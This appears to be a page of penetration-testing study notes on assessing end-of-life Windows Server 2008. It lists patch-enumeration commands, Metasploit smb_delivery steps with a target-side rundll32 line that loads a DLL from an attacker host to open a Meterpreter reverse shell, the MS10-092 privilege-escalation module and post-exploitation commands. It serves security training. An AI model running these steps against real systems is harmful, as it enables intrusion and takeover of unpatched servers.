27.windows-server

Windows Server 2008 Enumeration

wmic qfe
powershell.exe -ExecutionPolicy Bypass -File Sherlock.ps1
powershell.exe -ExecutionPolicy Bypass -Command "Import-Module .\Sherlock.ps1; Find-AllVulns"

Metasploit (smb_delivery)

msf6 exploit(windows/smb/smb_delivery) > use exploit/windows/smb/smb_delivery
msf6 exploit(windows/smb/smb_delivery) > set SRVHOST <attacker_ip>
msf6 exploit(windows/smb/smb_delivery) > set LHOST <attacker_ip>
msf6 exploit(windows/smb/smb_delivery) > set LPORT 4444
msf6 exploit(windows/smb/smb_delivery) > set target 0
msf6 exploit(windows/smb/smb_delivery) > exploit

Target (Run from cmd.exe)

rundll32.exe \\<attacker_ip>\\lEUZam\\test.dll,0

Metasploit (ms10_092_schelevator)

msf6 exploit(windows/local/ms10_092_schelevator) > use exploit/windows/local/ms10_092_schelevator
msf6 exploit(windows/local/ms10_092_schelevator) > set SESSION 1
msf6 exploit(windows/local/ms10_092_schelevator) > set LHOST <attacker_ip>
msf6 exploit(windows/local/ms10_092_schelevator) > set LPORT 4443
msf6 exploit(windows/local/ms10_092_schelevator) > exploit

Meterpreter Commands

meterpreter > getpid
meterpreter > ps
meterpreter > migrate <pid>
meterpreter > background
meterpreter > getuid
meterpreter > sysinfo

Key Points:

  • EOL Status:

    • Windows Server 2008/2008 R2 reached end-of-life on January 14, 2020.

  • Security Differences:

    • Older versions lack many security enhancements found in newer Windows Server releases (e.g., Enhanced Windows Defender ATP, Credential Guard, Device Guard, AppLocker, Control Flow Guard).

  • Case Study Importance:

    • Understanding the client's business context is crucial when dealing with legacy systems.

    • Recommendations should consider the impact on critical applications and potential mitigation strategies (e.g., network segmentation).

  • Enumeration and Exploitation:

    • Tools like Sherlock and Windows-Exploit-Suggester can identify missing patches and potential vulnerabilities.

    • Manual enumeration of patch levels is also possible.

    • wmic qfe is used to query the current patch level.

  • Exploitation Walkthrough:

    • Example uses the MS10-092 Task Scheduler vulnerability for privilege escalation.

    • Steps include:

      • Obtaining a Meterpreter reverse shell using smb_delivery.

      • Migrating to a 64-bit process.

      • Using the ms10_092_schelevator module.

      • The example also shows how to use ps and migrate within metasploit.

  • Key tools and commands:

    • wmic qfe

    • Sherlock.ps1

    • Windows-Exploit-Suggester

    • Metasploit (smb_delivery, ms10_092_schelevator)

    • Meterpreter commands (getpid, ps, migrate, getuid, sysinfo)

In essence:

  • Windows Server 2008/2008 R2 presents unique security challenges due to its EOL status and lack of modern security features.

  • Thorough enumeration and careful consideration of the client's environment are essential when assessing these systems.

  • Older operating systems often have many available exploits.

PreviousKey Points:Next28.windows-desktop-versions

Last updated